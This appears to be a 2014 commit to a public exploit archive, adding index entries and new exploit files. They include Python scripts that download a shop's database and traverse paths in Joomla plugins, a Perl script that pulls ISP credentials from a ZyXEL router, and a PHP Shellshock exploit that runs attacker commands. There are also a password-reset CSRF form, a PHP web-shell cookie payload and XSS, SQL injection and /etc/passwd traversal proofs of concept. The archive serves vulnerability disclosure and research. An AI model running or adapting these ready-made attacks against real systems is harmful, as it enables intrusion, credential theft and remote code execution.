Updated 09_26_2014

This commit is contained in:
Offensive Security 2014-09-26 04:44:01 +00:00
parent 8b9c29c462
commit dd094ab0a7
19 changed files with 1360 additions and 2 deletions

View file

@ -31188,7 +31188,7 @@ id,file,description,date,author,platform,type,port
34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 4.3 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
34640,platforms/php/webapps/34640.txt,"Mollify 1.6 'index.php' Cross Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0
34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0
@ -31261,6 +31261,7 @@ id,file,description,date,author,platform,type,port
34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
@ -31284,3 +31285,19 @@ id,file,description,date,author,platform,type,port
34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 'file' Parameter Local File Include Vulnerability",2014-09-23,Eolas_Gadai,php,webapps,0
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,metasploit,windows,remote,3000
34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,metasploit,windows,remote,0
34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80
34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80
34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80
34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80
34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0
34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80

Can't render this file because it is too large.

80
platforms/asp/webapps/34753.py Executable file
View file

@ -0,0 +1,80 @@
#!/usr/bin/env python
#-*- coding:cp1254 -*-
# Title : Onlineon E-Ticaret Database Disclosure Exploit (.py)
# dork : inurl:"default.asp?git=sepet"
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Download : http://www.onlineonweb.com/eticaret.html
# Demo : http://ayvalikkokluzeytincilik.com
# date : 06/09/2014
# Python : V 2.7
# Thks : exploit-db.com and others
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 2:
os.system(['clear','cls'][1])
print " ____________________________________________________________________"
print "| |"
print "| Onlineon E-Ticaret Database Disclosure Exploit (.py) |"
print "| ZoRLu / milw00rm.com |"
print "| exploit.py http://site.com/path/ |"
print "|____________________________________________________________________|"
sys.exit(1)
''' link kontrol 1 '''
koybasina = "http://"
koykicina = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != koykicina:
sitemiz += koykicina
if sitemiz[:7] != koybasina:
sitemiz = koybasina + sitemiz
database = "db/urun.mdb"
url2 = sitemiz + database
print "\n" + url2
print "\nlink check"
time.sleep(1)
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Err0r, Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'

View file

@ -0,0 +1,46 @@
#!/usr/bin/perl
# Exploit Author: Sebastián Magof
# Hardware: ZyXEL Prestig P-660HNU-T1
# Vulnerable file: wzADSL.asp
# location: http://gateway/cgi-bin/wzADSL.asp
# Bug: ISP usr+pwd disclosure
# Type: Local
# Date: 22/09/2014
# Vendor Homepage: http://www.zyxel.com/
# Version: 2.00(AAIJ.1)
# Tested on: Linux Fedora 20/Windows 7
# (\/)
# (**) Alpha (:
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n************************************************************\n";
print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)
print "************************************************************\n\n";#in oher country modify $url line 25
#isp pwd disclosure file
my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");
#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
#ISP usr+pwd Arnet Telecom Argentina;
print "User: $usr\n";
print "Password: $pwd\n\n";
exit(0);
__EOF__

View file

@ -0,0 +1,15 @@
Exploit Database Note:
The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test

View file

@ -0,0 +1,45 @@
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
die("Command sent to the server!\n");
else
die("Connection Error\n");
?>

View file

@ -1,6 +1,6 @@
######################
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection
# Exploit Author : Claudio Viviani

24
platforms/php/webapps/34718.txt Executable file
View file

@ -0,0 +1,24 @@
Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at
openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014
Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1.
About the application ------------------------ Easy, proactive
monitoring of Unix systems, network and cloud services. Conduct
automatic maintenance and recovery and execute meaningful causal actions
in error situations M/Monit expand on Monit's capabilities and provides
monitoring and management of all your Monit enabled hosts via a modern,
clean and well designed user interface which also works on mobile
devices. 2. Vulnerabilities Descriptions: -----------------------------
It was found that M/Monit latest version is vulnerable to CSRF attacks.
it is possible to reset the password of any user account (admin/regular)
on the system without needing to know the current set password for the
attacked account. 3. Proof of concept exploit
---------------------------- <html> <! -- CSRF PoC for M/Monit --> <div
align="center"> <pre> <h2><b> CSRF PoC for M/monit <b></h2> <body>
<form action="http://mmonit_server:8080/admin/users/update"
method="POST"> <input type="hidden" name="fullname"
value="Administrator" /> <input type="hidden" name="password"
value="Attacker_Passw0rd" /> <input type="hidden" name="email"
value="attacker@email.com" /> <input type="hidden" name="admin"
value="on" /> <input type="hidden" name="uname" value="admin" /> <input
type="submit" name="submit" value="Attack" /> </form> </body> </div>
</html>

114
platforms/php/webapps/34754.py Executable file
View file

@ -0,0 +1,114 @@
######################
# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://www.apptha.com
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150
# Dork Google: inurl:option=com_facegallery
# Date : 2014-09-17
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Info:
# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities
# PoC Exploit:
#
# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]
# "aid" and img_name variables are not sanitized.
######################
# Arbitrary file download exploit:
#!/usr/bin/env python
# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys
banner = """
__ __ _______
|__.-----.-----.--------| .---.-. | _ .---.-.----.-----.
| | _ | _ | | | _ | |. 1___| _ | __| -__|
| |_____|_____|__|__|__|__|___._| |. __) |___._|____|_____|
|___| |: |
|::.|
`---'
_______ __ __ _____ _______
| _ .---.-| | .-----.----.--.--. | _ | | _ |
|. |___| _ | | | -__| _| | | |.| |__|. | |
|. | |___._|__|__|_____|__| |___ | `-|. |__|. | |
|: 1 | |_____| |: | |: 1 |
|::.. . | |::.| |::.. . |
`-------' `---' `-------'
j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connection(url,pathtrav):
try:
response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')
content = response.read()
if content != "":
print '[!] VULNERABLE'
print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'
else:
print '[X] Not Vulnerable'
except urllib2.HTTPError:
print '[X] HTTP Error'
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
pathtrav = "../../"
connection(url,pathtrav)

112
platforms/php/webapps/34755.py Executable file
View file

@ -0,0 +1,112 @@
######################
# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://www.apptha.com
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18
# Dork Google: inurl:option=com_macgallery
# Date : 2014-09-17
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Info:
# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
# PoC Exploit:
#http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]
#"album_id" variable is not sanitized.
######################
#!/usr/bin/env python
# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys
banner = """
__ __ ___ ___
|__.-----.-----.--------| .---.-. | Y .---.-.----.
| | _ | _ | | | _ | |. | _ | __|
| |_____|_____|__|__|__|__|___._| |. \_/ |___._|____|
|___| |: | |
|::.|:. |
`--- ---'
_______ __ __ _____ _______
| _ .---.-| | .-----.----.--.--. | _ | | _ |
|. |___| _ | | | -__| _| | | |.| |__| 1___|
|. | |___._|__|__|_____|__| |___ | `-|. |__|____ |
|: 1 | |_____| |: | |: 1 |
|::.. . | |::.| |::.. . |
`-------' `---' `-------'
j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connection(url,pathtrav):
try:
response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
content = response.read()
if content != "":
print '[!] VULNERABLE'
print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
else:
print '[X] Not Vulnerable'
except urllib2.HTTPError:
print '[X] HTTP Error'
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
pathtrav = "../../"
connection(url,pathtrav)

84
platforms/php/webapps/34758.txt Executable file
View file

@ -0,0 +1,84 @@
------------------------------------------------------------------------
Glype proxy cookie jar path traversal allows code execution
------------------------------------------------------------------------
Securify, September 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A path traversal vulnerability has been identified in the Glype
web-based proxy that allows an attacker to run arbitrary PHP code on the
server or to remove critical files from the filesystem. This only
affects servers that are configured to:
- store Glype cookies locally; AND
- disable PHP display_errors; AND
- allow the webserver process to write to the filesystem (document
root).
------------------------------------------------------------------------
Affected versions
------------------------------------------------------------------------
This issue has been identified in Glype 1.4.9. Older version are most
likely affected as well.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Glype was informed and a fixed version (1.4.10) is now available at
www.glype.com
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
File creation via path traversal
When the "Store cookies on server" option is set in admin.php, Glype will create a cookie jar on the server to store a user's cookies. The filename for the cookie jar is created using the user's session ID.
browse.php
$toSet[CURLOPT_COOKIEFILE] = $toSet[CURLOPT_COOKIEJAR] = $CONFIG['cookies_folder'] . session_id();
PHP takes this session ID from a cookie, so the value returned by session_id() is under control of the user. By using path traversal a user can overwrite or create any file on the server with the rights of the webserver's system user.
Code execution
As a POC the following steps were taken to create and run a malicious PHP file in the webroot:
1. Glype was installed with the "Store cookies on server" option set in admin.php. The cookie directory remained default (tmp/cookies/).
2. A request was initiated with the Glype session cookie's value set to "../../test.php".
3. The Glype proxy was used to surf to a Securify controlled domain that returned a header that set a cookie containing a malicious PHP script.
Set-Cookie: TestCookie=<?php echo shell_exec($_GET['cmd']) ?>; expires=Thu, 31-Aug-2014 19:14:10 GMT
This caused Glype to write this PHP backdoor to test.php in the webroot. When requested using a browser, PHP parses the cookie jar file containing the malicious PHP code.
The following Python code can be used as a simple test to verify if your Glype installation is affected:
import urllib2
server = 'http://<glype server>'
url = '/browse.php?u=http%3A%2F%2Fwww.glype.com&b=28'
req = urllib2.Request(server + url)
req.add_header('Referer', server)
req.add_header('Cookie', 's=../securify')
r = urllib2.urlopen(req)
You are affected if a file named "securify" is created outside of the cookie directory.
Arbitrary file removal
The following code is affected by a (similar) path traversal vulnerability allowing an attacker to remove any file the HTTP process has access to:
includes/process.php
# Look for cookie file and check writable
if ( is_writable($file = $CONFIG['cookies_folder'] . session_id()) ) {
# Delete it
unlink($file);
}
This can for example be exploited to put a Glype server out of service or to clear log files.

54
platforms/php/webapps/34759.txt Executable file
View file

@ -0,0 +1,54 @@
------------------------------------------------------------------------
Glype proxy local address filter bypass
------------------------------------------------------------------------
Securify, September 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A vulnerability has been identified in the Glype web-based proxy. Glype
has a filter to disallow users from surfing to local addresses, to
prevents users from attacking the local server/network Glype is running
on. The filter can easily be bypassed by using IPs in decimal form.
------------------------------------------------------------------------
Affected versions
------------------------------------------------------------------------
This issue has been identified in Glype 1.4.9. Older version are most
likely affected as well.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Glype was informed and a fixed version (1.4.10) is now available at
www.glype.com
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
Glype local address bypass
Glype uses the following code (regex) to filter out internal/local addresses. This is intended to prevent proxy users from attacking local/internal resources through Glype.
browse.php
# Protect LAN from access through proxy (protected addresses copied from PHProxy)
if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
error('banned_site', $URL['host']);
}
This regex can easily be bypassed by using a decimal format IP address, which allows an attacker to browse/attack the internal server/network Glype is running on.
For example, if a server running Glype also runs phpmyadmin or another admin panel on local host, browsing to http://2130706433/phpmyadmin (2130706433 equals 127.0.0.1 in decimal) causes Glype to create a local connection to phpmyadmin, allowing remote access. Other internal web pages running on the internal network could be accessed like this as well.
Possible fix
Resolving the hostname using PHPs gethostbyname before using the regular expression will eliminate this bypass.
$URL['host'] = gethostbyname($URL['host]);
# Protect LAN from access through proxy (protected addresses copied from PHProxy)
if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
error('banned_site', $URL['host']);
}

29
platforms/php/webapps/34760.txt Executable file
View file

@ -0,0 +1,29 @@
Title: Pizza Inn Registration Stored XSS
Severity: High
CVE-ID: CVE-2014-6619
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/restaurantmis/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
Proof of Concept :
==================
http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register

55
platforms/php/webapps/34761.txt Executable file
View file

@ -0,0 +1,55 @@
Advisory ID: HTB23227
Product: webEdition
Vendor: webEdition e.V.
Vulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985) and probably prior
Tested Version: 6.3.8.0 (SVN-Revision: 6985)
Advisory Publication: August 6, 2014 [without technical details]
Vendor Notification: August 6, 2014
Vendor Patch: September 4, 2014
Public Disclosure: September 17, 2014
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2014-5258
Risk Level: Medium
CVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.
1) Path Traversal in webEdition: CVE-2014-5258
The vulnerability exists due to insufficient sanitization of the "file" HTTP GET parameter in "/webEdition/showTempFile.php" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. "../") and read contents of arbitrary files on the target system with privileges of the web server.
The exploitation example below display contents of "/etc/passwd" file:
http://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd
Successful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application.
-----------------------------------------------------------------------------------------------
Solution:
Update to webEdition 6.3.9 Beta
More Information:
http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23227 - https://www.htbridge.com/advisory/HTB23227 - Path Traversal in webEdition.
[2] webEdition - http://www.webedition.org - is a Content Management System.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

52
platforms/php/webapps/34762.txt Executable file
View file

@ -0,0 +1,52 @@
Details
================
Software: Login Widget With Shortcode
Version: 3.1.1
Homepage: http://wordpress.org/plugins/login-sidebar-widget/
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
Description
================
CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do
Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page. Using that ability they can use JavaScript to control an admin users browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.
Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=login_widget_afo\">
<input type=\"text\" name=\"custom_style_afo\" value=\"&lt;/textarea&gt;<script>alert(1)</script>\">
<input type=\"text\" name=\"option\" value=\"login_widget_afo_save_settings\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 3.2.1 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-08-26: Discovered
2014-09-15: Reported to vendor by email
2014-09-15: Vendor reported the issue fixed and a new version released
2014-09-17: Published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

49
platforms/php/webapps/34763.txt Executable file
View file

@ -0,0 +1,49 @@
Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031
Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/
Description
-----------
Local file inclusion vulnerability where discovered in Osclass, an
open source project that allows you to create a classifieds sites.
Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2
Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.
About Netsparker
----------------
Netsparker can find and report security issues and vulnerabilities
such as SQL Injection and Cross-site Scripting (XSS) in all websites
and web applications regardless of the platform and the technology
they are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information on Netsparker visit
https://www.netsparker.com.

249
platforms/php/webapps/34764.txt Executable file
View file

@ -0,0 +1,249 @@
=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0
=== Executive Summary ===
SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
of cart.php page. Successful exploitation of the vulnerabilities results in read
sensitive data from the database and, in some cases, execute administration
operation on the database or issue commands to the operating system.
Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
a lack in the neutralization[2] of multiple pages output which includes the user
submitted content. Successful exploitation of the vulnerabilities, results in
the execution of arbitrary HTML and script code in the users browser in the context of
the victim user's session trough a “Reflected XSS”.
Open Redirect: Using a specially crafted HTTP request, it is possible to
redirect[3] the normal browsing of users to a malicious site by modifying
untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
msg.php and page.php pages. Successful exploitation of the vulnerabilities
results in phishing scam, user credential theft, malware dissemination.
=== Proof of Concept ===
= SQL Injection (based on MySQL) =
A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
CMS. The function “sql_query” in file “cart.php” doesnt sanitize the “$item_id”
parameter, so error based and boolean-based blind or time-based blind SQL
Injection attacks can be executed.
## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"
